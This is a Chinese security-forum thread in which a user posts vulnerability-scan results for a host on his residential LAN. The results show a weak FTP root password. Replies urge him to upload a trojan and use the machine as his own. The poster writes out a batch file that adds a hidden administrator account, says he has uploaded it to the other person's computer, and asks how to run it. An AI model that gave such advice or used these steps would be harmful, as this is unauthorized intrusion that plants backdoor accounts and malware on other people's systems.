|
作者: qishibushi [qishibushi] 论坛用户 | 登录 |
扫描了一下小区的局域网.如下 [扫描结果索引]: "10.163.250.225" 路由信息 开放端口 Snmp信息 SSL漏洞 RPC漏洞 SQL-Server弱口令 FTP弱口令 NT-Server弱口令 SMTP漏洞 POP3弱口令 CGI漏洞 IIS漏洞 [NetBios信息] 远程注册表信息 服务器信息 主域控制器名称 网络传输列表 网络会话列表 网络服务器列表 网络磁盘列表 网络共享资源列表 网络用户列表 本地组列表 组列表 网络文件列表 计划任务列表 网络映射列表 -------------------------------------------------------------------------------- 详细资料 [路由信息] 01 0000 ms - 10.163.250.225 插件类型: ROUTE 插件成员名称: 路由信息 插件作者: glacier 插件版本: 1.0 风险等级: 无 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 -------------------------------------------------------------------------------- [开放端口] 端口21开放: FTP (Control) [Banner] 220 FTP Server 1.2.4 (FTPD) [End of banner] 端口23开放: Telnet [Banner] �?�?�?�? [End of banner] 插件类型: PORT 插件成员名称: 开放端口 插件作者: glacier 插件版本: 1.7 风险等级: 低 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 -------------------------------------------------------------------------------- [Snmp信息] -------------------------------------------------------------------------------- [SSL漏洞] -------------------------------------------------------------------------------- [RPC漏洞] -------------------------------------------------------------------------------- [SQL-Server弱口令] -------------------------------------------------------------------------------- [FTP弱口令] root/[口令与用户名相同] 插件类型: FTP 插件成员名称: FTP弱口令 插件作者: glacier 插件版本: 1.1 风险等级: 高 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 -------------------------------------------------------------------------------- [NT-Server弱口令] -------------------------------------------------------------------------------- [NetBios信息] -------------------------------------------------------------------------------- [SMTP漏洞] -------------------------------------------------------------------------------- [POP3弱口令] -------------------------------------------------------------------------------- [CGI漏洞] -------------------------------------------------------------------------------- [IIS漏洞] -------------------------------------------------------------------------------- 扫描全部完成 |
地主 发表时间: 08/23 10:12 |
回复: tommy_he [tommy_he] 版主 | 登录 |
你确定一下这个ROOT是不是超级用户先! 如果是就上传个木马,然后打开这个,自己把他当自己的电脑用就可以了! |
B1层 发表时间: 08/23 10:16 |
回复: qishibushi [qishibushi] 论坛用户 | 登录 |
我用ie使用root权限登陆后,可以任意删除上传文件。 但是我不知道怎样在对方机器里运行文件呀。什么命令啊? |
B2层 发表时间: 08/23 10:18 |
回复: qishibushi [qishibushi] 论坛用户 | 登录 |
还有,怎么确定是不是超级用户啊? 在ie里我上传了一个文件,然后在属性里可以选择“执行”。 但是我不知道怎样执行它。。 |
B3层 发表时间: 08/23 10:24 |
回复: yuner20 [yuner20] 论坛用户 | 登录 |
试试能不能新建用户就知道是否是超级用户了 |
B4层 发表时间: 08/23 13:03 |
回复: qishibushi [qishibushi] 论坛用户 | 登录 |
目前我只知道几个命令,当然,我是大菜鸟一个。前一阵子我的计算机被别人侵入过,所以我想弄明白怎么回事。 net命令仅仅是一知半解。 所以我做了一个bat文件,内容如下。 @ net user admin 123 /add @ net localgroup administrators admin /add 然后我传到了那个人的机器上,可是我不知道怎样才能让这个文件在他的计算机上运行。不知道ftp有没有这样的命令,我搜索了google也没有搜到。 不知道这个想法成立不成立。 各位大虾帮帮我。 |
B5层 发表时间: 08/23 13:31 |
回复: qishibushi [qishibushi] 论坛用户 | 登录 |
用root身份进入后仅仅有两个文件,好象是个空文件夹。 估计没有多少用处。 但是能否根据这个到达他的根目录呀,什么c盘什么的。 |
B6层 发表时间: 08/23 13:42 |
回复: keke [keke1] 论坛用户 | 登录 |
有权限就可以了。。。上传木马 |
B7层 发表时间: 08/23 16:55 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号